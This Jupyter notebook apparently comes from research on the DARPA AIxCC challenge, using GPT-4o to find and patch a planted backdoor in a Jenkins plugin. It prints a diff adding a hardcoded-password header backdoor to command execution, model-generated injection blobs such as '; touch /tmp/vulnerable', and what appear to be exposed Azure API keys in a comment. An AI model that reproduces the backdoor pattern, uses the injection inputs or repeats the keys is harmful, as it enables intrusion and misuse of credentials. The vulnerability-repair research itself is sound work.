In [1]:
import os
import sys
import subprocess
import time
import re
from langchain_openai import ChatOpenAI
from openai import AzureOpenAI

In [77]:
%pip install gitpython


Note: you may need to restart the kernel to use updated packages.



[notice] A new release of pip is available: 24.0 -> 24.1.1
[notice] To update, run: python.exe -m pip install --upgrade pip


In [2]:
#Note: The openai-python library support for Azure OpenAI is in preview.
#Note: This code sample requires OpenAI Python library version 1.0.0 or higher.


#key1: 7549f11ab7f9442685838d936d8f7787
#key2: c3112b58dbb840c693ea08c9a9362fb3
#endpoint: https://aixcc-openai-westus.openai.azure.com/

gpt4o_key = '<gpt4o key here>'  #gpt-4-1106
gpt4_key = '<gpt4 key here>'   #gpt-4-vision, gpt-4o

model_name = 'gpt-4o'  #gpt-4-vision, gpt-4o

os.environ['AZURE_OPENAI_KEY'] = gpt4o_key

client = AzureOpenAI(
  azure_endpoint = "<endpoint here>", 
  api_key=os.getenv("AZURE_OPENAI_KEY"),  
  api_version="2024-02-15-preview"
)

In [3]:
def get_inference(user_input):
    # user_input = "what is the capital of France?"

    tic = time.time()
    message_text = [{"role":"system","content":"You are an AI assistant that helps people find information."},{"role":"user","content":user_input}]

    response = client.chat.completions.create(
        model=model_name,
        messages = message_text,
        temperature=0.7,
        max_tokens=4096,
        top_p=0.95,
        frequency_penalty=0,
        presence_penalty=0,
        stop=None
    )

    print(response.choices[0].message.content)
    latency = time.time() - tic
    print(f"\nLatency: {latency:.3f}s")
    return response.choices[0].message.content

#### Source code is the Challenge Project 2 (CP2) of the AIXCC DARPA Challenge

In [4]:
src_dir = "C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src"
print(src_dir)

C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src


In [7]:
folders = [f for f in os.listdir(src_dir) if os.path.isdir(os.path.join(src_dir, f))]

print("Folders in the source directory:")
for folder in folders:
    print(folder)

Folders in the source directory:
jenkins
jenkins-harnesses
plugins


#### 2 source files - jenkins & plugins 

#### Finding all dirs which have the src directory

In [8]:
# def find_and_log_src_dirs(current_path):
#     for root, dirs, files in os.walk(current_path):
#         if 'src' in dirs:
#             src_path = os.path.join(root, 'src')
#             print(f"Found 'src' directory at: {src_path}")
#             try:
                
#                 os.chdir(src_path)
                
#                 result = subprocess.run(['wsl', 'git', 'log', '--oneline'], capture_output=True, text=True)
                
#                 print(f"Git log for {src_path}:\n{result.stdout}")
#             except Exception as e:
#                 print(f"An error occurred while running git log in {src_path}: {e}")
#             dirs.remove('src')

In [33]:
all_paths = []
def finding_src_dirs(current_path):
    for root, dirs, files in os.walk(current_path):
        if 'src' in dirs:
            src_path = os.path.join(root, 'src')
            try:
                os.chdir(src_path)
                normalized_src_path = os.path.normpath(src_path)
                normalized_src_path = normalized_src_path.replace('\\', '/')
                all_paths.append(normalized_src_path)
            except Exception as e:
                print(f"Error : {e}")
            dirs.remove('src')

In [34]:
finding_src_dirs(src_dir)

In [35]:
all_paths

['C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/cli/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/core/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/test/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/war/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/websocket/jetty10/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins/websocket/spi/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/jenkins-harnesses/jenkins-harness-two/src',
 'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/plugins/pipeline-util-plugin/src']

##### Below defined are the sanitizer logs which describes the vulnerability in the code, and the sanitizer which is triggered

In [5]:
logs = '''
== Java Exception: com.code_intelligence.jazzer.api.FuzzerSecurityIssueCritical: OS Command Injection
Executing OS commands with attacker-controlled data can lead to remote code execution.
Found in argument 0
        at com.code_intelligence.jazzer.sanitizers.OsCommandInjection.ProcessImplStartHook(OsCommandInjection.java:35)
        at java.base/java.lang.ProcessBuilder.start(ProcessBuilder.java:1110)
        at java.base/java.lang.ProcessBuilder.start(ProcessBuilder.java:1073)
        at io.jenkins.plugins.UtilPlug.UtilMain.createUtils(UtilMain.java:194)
        at io.jenkins.plugins.UtilPlug.UtilMain.doexecCommandUtils(UtilMain.java:157)
        at com.aixcc.jenkins.harnesses.two.JenkinsTwo.fuzz(JenkinsTwo.java:80)
        at com.aixcc.jenkins.harnesses.two.JenkinsTwo.fuzzerTestOneInput(JenkinsTwo.java:39)
DEDUP_TOKEN: 2ab70579dcd49e31
== libFuzzer crashing input ==
reproducer_path='.'; Java reproducer written to ./Crash_70a0fbdbde2ac5ea0f8e038449f4ad2492028a7b.java

jazzer exit=77
'''

##### Getting the exact path of the src/ dir where the error occured (since there were multiple source files)

In [37]:
user_input = f'''Given the = {logs} which mention the class where the error occurs, and the source files {all_paths}, 
can you identify which path in the source code is causing the vulnerability mentioned in the logs? 
Just mention the source path from the {all_paths} in your response and nothing else'''


In [38]:

get_path = get_inference(user_input)

C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/plugins/pipeline-util-plugin/src

Latency: 1.281s


Correctly indentifies the source path from the logs (from run_pov command) and the source directories paths 

#### Now, lets move to this source path mentioned in the response and run 'git log command' to get the commits 

In [39]:
!cd {get_path} 

In [40]:
pwd

'C:\\Users\\neham\\TAMU\\research_project_llm\\challenge-002-jenkins-cp\\src\\plugins\\pipeline-util-plugin\\src'

In [41]:
# Get list of commit hashes
!wsl git log --pretty=format:"%H"


341da485d908f5501f04beb49564c7c7cc0b34eb
d4860a8ac8b8c1d4642357840adb4347f7ade43a
a868688561d1d768dd4c3c68a3b3522b396a37b6


In [7]:
parent_folder = os.path.dirname(src_dir)

In [8]:
parent_folder

'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp'

In [48]:
import subprocess
import os


def get_commit_hashes():
    result = subprocess.run(["wsl", "git", "log", "--pretty=format:%H"], capture_output=True, text=True)
    return result.stdout.splitlines()

def get_diff(commit_hash):
    result = subprocess.run(["wsl", "git", "show", commit_hash], capture_output=True, text=True)
    if result.returncode == 0:  
        return result.stdout
    else:
        print(f"Error fetching diff for commit {commit_hash}")
        return None

commits = get_commit_hashes()
commits.reverse()

for commit in commits:
    diff_content = get_diff(commit)
    if diff_content is not None:
        lines = diff_content.split('\n')
        
        diff_start_index = next((i for i, line in enumerate(lines) if line.startswith('diff --git')), None)

        if diff_start_index is not None:
            relevant_lines = lines[diff_start_index:]

            relevant_diff_content = '\n'.join(relevant_lines)

            filename = f"{commit}.diff"
            filepath = os.path.join(parent_folder, filename)
            
            with open(filepath, 'w') as f:
                f.write(relevant_diff_content)
                
            print(f"Saved diff for commit {commit} to {filepath}")
        else:
            print(f"No 'diff --git' line found for commit {commit}. Skipping.")
    else:
        print(f"Skipping commit {commit} due to error or no diff content")


Saved diff for commit a868688561d1d768dd4c3c68a3b3522b396a37b6 to C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp\a868688561d1d768dd4c3c68a3b3522b396a37b6.diff
Saved diff for commit d4860a8ac8b8c1d4642357840adb4347f7ade43a to C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp\d4860a8ac8b8c1d4642357840adb4347f7ade43a.diff
Saved diff for commit 341da485d908f5501f04beb49564c7c7cc0b34eb to C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp\341da485d908f5501f04beb49564c7c7cc0b34eb.diff


In [49]:
commits

['a868688561d1d768dd4c3c68a3b3522b396a37b6',
 'd4860a8ac8b8c1d4642357840adb4347f7ade43a',
 '341da485d908f5501f04beb49564c7c7cc0b34eb']

In [9]:
commit = 'd4860a8ac8b8c1d4642357840adb4347f7ade43a'  #commit which introduced the vulnerability (mentioned in the challenge project) 

filename = f"{commit}.diff"
filepath = os.path.join(parent_folder, filename)

if os.path.exists(filepath):
    # Read the file contents
    with open(filepath, 'r') as f:
        diff_content = f.read()
        print(diff_content)  # Display diff content as a string
else:
    print(f"Diff file for commit {commit} not found.")

diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index a854420..35135ea 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,7 +148,22 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-       if (isAllowed) {
+        // hardcoded hash value:
+        byte[] sha256 = DigestUtils.sha256("breakin the law");
+        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
+            String backdoorValue = request.getHeader("x-evil-backdoor");
+            byte[] providedHash = DigestUtils.sha256(backdoorValue);
+            if (MessageDigest.isEqual(sha256, providedHash)) {
+                String result = createUtils(cmdSeq2);
+                if (result == null || result.length() == 0) {
+                    

In [10]:
diff_content

'diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\nindex a854420..35135ea 100644\n--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\n+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\n@@ -148,7 +148,22 @@ public class UtilMain implements RootAction {\n         // use LOCAL method:\n         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);\n \n-       if (isAllowed) {\n+        // hardcoded hash value:\n+        byte[] sha256 = DigestUtils.sha256("breakin the law");\n+        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {\n+            String backdoorValue = request.getHeader("x-evil-backdoor");\n+            byte[] providedHash = DigestUtils.sha256(backdoorValue);\n+            if (MessageDigest.isEqual(sha256, providedHash)) {\n+                String result = createUtils(cmdSeq2);\n+                if (result == null || result.length() == 0) {\n+  

In [52]:
def get_changed_files(diff_content):
    changed_files = set()  # Use a set to store unique file paths
    lines = diff_content.split('\n')
    
    for line in lines:
        if line.startswith('diff --git'):
            file_paths = line.split(' ')[2:4]  # Extract 'a/path/to/file' and 'b/path/to/file'
            file_paths = [path[2:] if path.startswith('a/') or path.startswith('b/') else path for path in file_paths]  # Remove 'a/' or 'b/' prefix
            changed_files.update(file_paths)
    
    return changed_files

commit = 'd4860a8ac8b8c1d4642357840adb4347f7ade43a'  #commit which introduced the vulnerability 

filename = f"{commit}.diff"
filepath = os.path.join(parent_folder, filename)
changed_files_src = []

if os.path.exists(filepath):
        with open(filepath, 'r') as f:
            diff_content = f.read()

        changed_files = get_changed_files(diff_content)

        print("Changed files:")
        for file_path in changed_files:
            changed_files_src.append(file_path)
            print(file_path)

else:
    print(f"Diff file for commit {commit} not found.")


Changed files:
src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java


### Test harness code - JenkinsTwo.java

In [55]:
test_file_path = src_dir + '/jenkins-harnesses/jenkins-harness-two/src/main/java/com/aixcc/jenkins/harnesses/two'

In [57]:
def read_file(file_path):
    try:
        with open(file_path, 'r') as file:
            file_content = file.read()
        return file_content
    except FileNotFoundError:
        print(f"Error: File '{file_path}' not found.")
        return None
    except Exception as e:
        print(f"Error: {e}")
        return None
    
file_path = test_file_path + '/JenkinsTwo.java'
file_content = read_file(file_path)
print(file_content)

package com.aixcc.jenkins.harnesses.two;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.Enumeration;
import java.util.List;

import jenkins.model.Jenkins;
import aixcc.util.StaplerReplacer;
import java.nio.ByteBuffer;
import java.util.*;

import io.jenkins.plugins.UtilPlug.UtilMain;
import org.kohsuke.stapler.WebApp;
import org.kohsuke.stapler.RequestImpl;
import org.kohsuke.stapler.ResponseImpl;
import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.mockito.Mockito;
import static org.mockito.Mockito.*;

public class JenkinsTwo {

    public static void main(String[] args) throws Throwable {
    }


    final int expected_data_length = Integer.BYTES + // picker
            Integer.BYTES + // count
            1 + // request header name minimum
            1 + // separator
            1 + // request header value minimum
            1 + // separator


### Prompts to get Input blob 

In [64]:
user_input = f'''
You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability - 

{diff_content}

The vulnerability details are mentioned as follows - 
{logs}

Provide a input blob such that when it is passed through the test harness mentioned below, it will trigger the vulnerability.
{file_content}

Check the source code mentioned in the commit diff, logs and test file throughly to identify the input blob that triggers the vulnerability.
Only provide the blob without any additional information.
'''

In [65]:
print(user_input)


You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability - 

diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index a854420..35135ea 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,7 +148,22 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-       if (isAllowed) {
+        // hardcoded hash value:
+        byte[] sha256 = DigestUtils.sha256("breakin the law");
+        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
+            String backdoorValue = request.getHeader("x-evil-backdoor");
+            byte[] providedHash = DigestUtils.sha256(backdoorValue);
+            if (MessageDigest.isEqual(sha256, providedHash)) {
+                String result 

In [61]:
blob_output = get_inference(user_input)

```
AAAAAAAABAAAAAADeC1ldmlsLWJhY2tkb29yAGJyZWFraW4gdGhlIGxhdyB8IGVjaG8gIkJhc2ggLWkgcCBjYWwgL2Jpbi9zaCI=
```

Latency: 1.963s


In [62]:
blob_output = get_inference(user_input)

```hex
0000000d 00000001 782d6576 696c2d62 61636b64 6f6f72 006272 65616b 696e20 7468 6520 6c61 7700 2f62 696e 2f73 6820 2d63 2065 6368 6f20 6869 002d
```

Latency: 3.008s


In [66]:
blob_output = get_inference(user_input)  
# got this blob content after mentioning this line - 'Check the source code mentioned in the commit diff, logs and test file throughly to identify the input blob that triggers the vulnerability.'

```
\0x-evil-backdoor\0breakin the law\0; touch /tmp/vulnerable\0
```

Latency: 1.025s


In [69]:
blob_output = get_inference(user_input)  

```
\r\nx-evil-backdoor\0breakin the law\0;touch /tmp/vulnerable\0
```

Latency: 0.751s


### Trying out prompts to get a patch 

In [131]:
user_input_patch = f''' 
You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability -
{diff_content}

The vulnerability details are mentioned as follows -
{logs}

Analyze the commit and the logs carefully to identify the vulnerability introduced in the commit.
Provide a patch that fixes the vulnerability introduced in the commit. Ensure that the patch is in correct format.
Only include the patch in your response.
'''

In [132]:
print(user_input_patch)

 
You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability -
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index a854420..35135ea 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,7 +148,22 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-       if (isAllowed) {
+        // hardcoded hash value:
+        byte[] sha256 = DigestUtils.sha256("breakin the law");
+        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
+            String backdoorValue = request.getHeader("x-evil-backdoor");
+            byte[] providedHash = DigestUtils.sha256(backdoorValue);
+            if (MessageDigest.isEqual(sha256, providedHash)) {
+                String result =

In [133]:
get_inference(user_input_patch)

```diff
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..b123456 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,7 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-        // hardcoded hash value:
-        byte[] sha256 = DigestUtils.sha256("breakin the law");
-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-            String backdoorValue = request.getHeader("x-evil-backdoor");
-            byte[] providedHash = DigestUtils.sha256(backdoorValue);
-            if (MessageDigest.isEqual(sha256, providedHash)) {
-                String result = createUtils(cmdSeq2);
-                if (result == null || result.length() == 0) {
-                    Event event = new

'```diff\ndiff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\nindex 35135ea..b123456 100644\n--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\n+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java\n@@ -148,22 +148,7 @@ public class UtilMain implements RootAction {\n         // use LOCAL method:\n         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);\n \n-        // hardcoded hash value:\n-        byte[] sha256 = DigestUtils.sha256("breakin the law");\n-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {\n-            String backdoorValue = request.getHeader("x-evil-backdoor");\n-            byte[] providedHash = DigestUtils.sha256(backdoorValue);\n-            if (MessageDigest.isEqual(sha256, providedHash)) {\n-                String result = createUtils(cmdSeq2);\n-                if (result == null || result.length() == 0) {\n-                   

In [20]:
patch = '''
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..e2f4a23 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,9 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-        // hardcoded hash value:
-        byte[] sha256 = DigestUtils.sha256("breakin the law");
-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-            String backdoorValue = request.getHeader("x-evil-backdoor");
-            byte[] providedHash = DigestUtils.sha256(backdoorValue);
-            if (MessageDigest.isEqual(sha256, providedHash)) {
-                String result = createUtils(cmdSeq2);
-                if (result == null || result.length() == 0) {
-                    Event event = new Event(Event.Status.ERROR, "Error: empty result", cmdSeq2);
-                    events.add(event);
-                }
-            } else {
-                Event event = new Event(Event.Status.ERROR, "Error: Only Admin Users Are Permitted", cmdSeq2);
-                events.add(event);
-            }
-        } else if (isAllowed) {
+        if (isAllowed) {
             String result = createUtils(cmdSeq2);
             if (result == null || result.isEmpty()) {
                 Event event = new Event(Event.Status.ERROR, "Error: empty result", cmdSeq2);
'''



In [12]:
source_code_path = src_dir+ "/plugins/pipeline-util-plugin/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java"


In [13]:
source_code_path

'C:/Users/neham/TAMU/research_project_llm/challenge-002-jenkins-cp/src/plugins/pipeline-util-plugin/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java'

In [14]:
with open(source_code_path, "r") as file:
    source_code_lines = file.readlines()

### Extracting source code from the patch (source file and line numbers mentioned)

In [90]:
source_code_lines

['/*\n',
 ' * The MIT License\n',
 ' *\n',
 ' * Copyright 2016 CloudBees, Inc.\n',
 ' *\n',
 ' * Permission is hereby granted, free of charge, to any person obtaining a copy\n',
 ' * of this software and associated documentation files (the "Software"), to deal\n',
 ' * in the Software without restriction, including without limitation the rights\n',
 ' * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n',
 ' * copies of the Software, and to permit persons to whom the Software is\n',
 ' * furnished to do so, subject to the following conditions:\n',
 ' *\n',
 ' * The above copyright notice and this permission notice shall be included in\n',
 ' * all copies or substantial portions of the Software.\n',
 ' *\n',
 ' * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n',
 ' * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n',
 ' * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n',
 ' * AU

In [109]:
def parse_patch(patch):
    diff_hunks = re.findall(r'@@ -(\d+),(\d+) \+(\d+),(\d+) @@', patch)
    patch_lines = patch.splitlines()
    return diff_hunks, patch_lines

diff_hunks, patch_lines = parse_patch(patch=patch)

In [110]:

# Extract the lines from the source code based on the diff hunks
def extract_source_lines(source_code_lines, diff_hunks):
    extracted_lines = {}
    for hunk in diff_hunks:
        start_line = int(hunk[0]) - 1
        line_count = int(hunk[1])
        for i in range(line_count):
            extracted_lines[start_line + 1 + i] = source_code_lines[start_line + i].strip()
    return extracted_lines

source_lines = extract_source_lines(source_code_lines, diff_hunks)

In [111]:
source_lines

{148: '// use LOCAL method:',
 149: 'boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);',
 150: '',
 151: '// hardcoded hash value:',
 152: 'byte[] sha256 = DigestUtils.sha256("breakin the law");',
 153: 'if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {',
 154: 'String backdoorValue = request.getHeader("x-evil-backdoor");',
 155: 'byte[] providedHash = DigestUtils.sha256(backdoorValue);',
 156: 'if (MessageDigest.isEqual(sha256, providedHash)) {',
 157: 'String res_match = createUtils(cmdSeq2);',
 158: 'if (res_match == null || res_match.length() == 0) {',
 159: 'Event event = new Event(Event.Status.ERROR, "Error: empty result", cmdSeq2);',
 160: 'events.add(event);',
 161: '}',
 162: '} else {',
 163: 'Event event = new Event(Event.Status.ERROR, "Error: Only Admin Users Are Permitted", cmdSeq2);',
 164: 'events.add(event);',
 165: '}',
 166: '} else if (isAllowed) {',
 167: 'String res_auth = createUtils(cmdSeq2);',
 168: 'if (res_auth == null || res_au

### Using GPT4o to correct the AI (GPT4o) generated patch by providing source lines and instructions to follow

Prompting GPT4o to correct the generated patch by providing the generated patch previously, source code and instructions on how the source code lines can be used to correct the patch 

In [124]:
user_input_correct_patch = f''' The generated patch cannot be applied - 
{patch} 
Correct this patch using the corresponding source code - 
{source_lines}
Replace the '-' lines in patch with the corresponding lines from the source code 
Keep the '+' lines in the patch as it is
For the rest of the lines, replace with the corresponding lines from the source code
Ensure that the identation and formatting is correct in the patch, also that the line numbers and number of lines
affected in the original file and modified file are correctly mentioned in the patch.
Only provide the patch without further information.
'''

In [125]:
generated_patch = get_inference(user_input_correct_patch)

```diff
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..e2f4a23 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,9 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-        // hardcoded hash value:
-        byte[] sha256 = DigestUtils.sha256("breakin the law");
-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-            String backdoorValue = request.getHeader("x-evil-backdoor");
-            byte[] providedHash = DigestUtils.sha256(backdoorValue);
-            if (MessageDigest.isEqual(sha256, providedHash)) {
-                String res_match = createUtils(cmdSeq2);
-                if (res_match == null || res_match.length() == 0) {
-                    Event ev

### Providing all details to GPT4o to give the correct patch in the first go 
(commit diff, sanitizer logs, and source code)

Tried with GPT4o to get the right patch by passing the commit diff, sanitizer logs, and the source code (so that it uses the source to get the lines correct so that there are no issues when the patch is to be applied) 

This does not work. It gives opposite results (gives + lines where there should be - and vice versa) probably because the prompt becomes too long and confusing to analyze for the model 

In [139]:
user_input_patch = f''' 
You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability -
{diff_content}

The vulnerability details are mentioned as follows -
{logs}

Analyze the commit and the logs carefully to identify the vulnerability introduced in the commit.
Provide a patch that fixes the vulnerability introduced in the commit. 
Ensure that the patch is in correct format. 

Only include the patch in your response.
'''

In [141]:
print(user_input_patch)

 
You are a security expert. In the Jenkins project, the following the commit introduces a vulnerability -
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index a854420..35135ea 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,7 +148,22 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-       if (isAllowed) {
+        // hardcoded hash value:
+        byte[] sha256 = DigestUtils.sha256("breakin the law");
+        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
+            String backdoorValue = request.getHeader("x-evil-backdoor");
+            byte[] providedHash = DigestUtils.sha256(backdoorValue);
+            if (MessageDigest.isEqual(sha256, providedHash)) {
+                String result =

In [140]:
output_patch_2 = get_inference(user_input_patch)

```diff
diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..7d2c9f4 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,7 @@ public class UtilMain implements RootAction {
         // use LOCAL method:
         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
 
-        // hardcoded hash value:
-        byte[] sha256 = DigestUtils.sha256("breakin the law");
-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-            String backdoorValue = request.getHeader("x-evil-backdoor");
-            byte[] providedHash = DigestUtils.sha256(backdoorValue);
-            if (MessageDigest.isEqual(sha256, providedHash)) {
-                String result = createUtils(cmdSeq2);
-                if (result == null || result.length() == 0) {
-                    Event event = new

### Automation script - get the source code and correct the generated patch line by line 

In [15]:
# Parse the patch to identify the line numbers and changes
def parse_patch(patch):
    diff_hunks = re.findall(r'@@ -(\d+),(\d+) \+(\d+),(\d+) @@', patch)
    patch_lines = patch.splitlines()
    return diff_hunks, patch_lines

diff_hunks, patch_lines = parse_patch(patch)

# Extract the lines from the source code based on the diff hunks
def extract_source_lines(source_code_lines, diff_hunks):
    extracted_lines = {}
    for hunk in diff_hunks:
        start_line = int(hunk[0]) - 1
        line_count = int(hunk[1])
        for i in range(line_count):
            extracted_lines[start_line + 1 + i] = source_code_lines[start_line + i].strip()
    return extracted_lines

source_lines = extract_source_lines(source_code_lines, diff_hunks)

# Compare and correct the patch based on the extracted lines
def correct_patch(patch_lines, source_lines):
    corrected_patch = []
    current_hunk_start = None
    line_offset = 0
    in_hunk = False
    
    for line in patch_lines:
        if line.startswith('@@'):
            corrected_patch.append(line)
            current_hunk_start = int(re.findall(r'@@ -(\d+),', line)[0])
            line_offset = 0
            in_hunk = True
        elif in_hunk:
            if line.startswith('-'):
                line_number = current_hunk_start + line_offset
                corrected_patch.append(f"-{source_lines.get(line_number, line[1:].strip())}")
                line_offset += 1
            elif line.startswith('+'):
                corrected_patch.append(line)
            elif line.startswith(' '):
                line_number = current_hunk_start + line_offset
                corrected_patch.append(f" {source_lines.get(line_number, line[1:].strip())}")
                line_offset += 1
            else:
                corrected_patch.append(line)
        else:
            corrected_patch.append(line)
            
    # Append remaining context lines from source code if necessary
    if in_hunk and line_offset < len(source_lines):
        for i in range(line_offset, len(source_lines)):
            corrected_patch.append(f" {source_lines.get(current_hunk_start + i + 1, '').strip()}")

    return corrected_patch

corrected_patch_lines = correct_patch(patch_lines, source_lines)

# Print the corrected patch in the required format
for line in corrected_patch_lines:
    print(line)


diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..e2f4a23 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,9 @@ public class UtilMain implements RootAction {
 */
 @RequirePOST
 public void doexecCommandUtils(
-@QueryParameter String cmdSeq2,
-StaplerRequest request,
-StaplerResponse response)
-throws ServletException, IOException, BadCommandException {
-
-// use LOCAL method:
-boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
-
-// hardcoded hash value:
-byte[] sha256 = DigestUtils.sha256("breakin the law");
-if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-String backdoorValue = request.getHeader("x-evil-backdoor");
-byte[] providedHash = DigestUtils.sha256(backdoorValue);
-if (MessageDigest.isEqual(sha256, providedHash)) {
-String res_match = createUtils(cmdSeq2)

### Working script below with CP-2

In [21]:
def parse_patch(patch):
    diff_hunks = re.findall(r'@@ -(\d+),(\d+) \+(\d+),(\d+) @@', patch)
    patch_lines = patch.splitlines()
    return diff_hunks, patch_lines

diff_hunks, patch_lines = parse_patch(patch)
print(diff_hunks)
print(patch_lines)

def extract_source_lines(source_code_lines, diff_hunks):
    extracted_lines = {}
    for hunk in diff_hunks:
        start_line = int(hunk[0]) - 1
        line_count = int(hunk[1])
        for i in range(line_count):
            extracted_lines[start_line + 1 + i] = source_code_lines[start_line + i].rstrip()
    return extracted_lines

source_lines = extract_source_lines(source_code_lines, diff_hunks)

